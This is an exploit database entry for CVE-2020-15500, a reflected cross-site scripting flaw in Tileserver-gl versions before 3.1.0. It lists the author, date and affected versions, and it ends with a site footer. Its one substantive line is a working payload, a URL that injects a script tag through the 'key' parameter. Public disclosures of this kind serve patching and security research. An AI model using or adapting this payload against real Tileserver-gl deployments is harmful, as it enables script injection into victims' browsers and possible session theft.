Tileserver-gl 3.0.0 Exploit, 'key' Reflected Cross-Site Scripting (XSS)

# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
# Date: 15/04/2021
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://tileserver.org/
# Software Link: https://github.com/maptiler/tileserver-gl
# Version: versions <3.1.0
# Tested on: 2.6.0
# CVE: 2020-15500

Exploit : http://example.com/?key="><script>alert(document.domain)</script>

All rights reserved nPulse.net 2009 - 2021
Powered by: MVCP 2.0-RC / ASPF / PHP 7.4 / NGINX / FreeBSD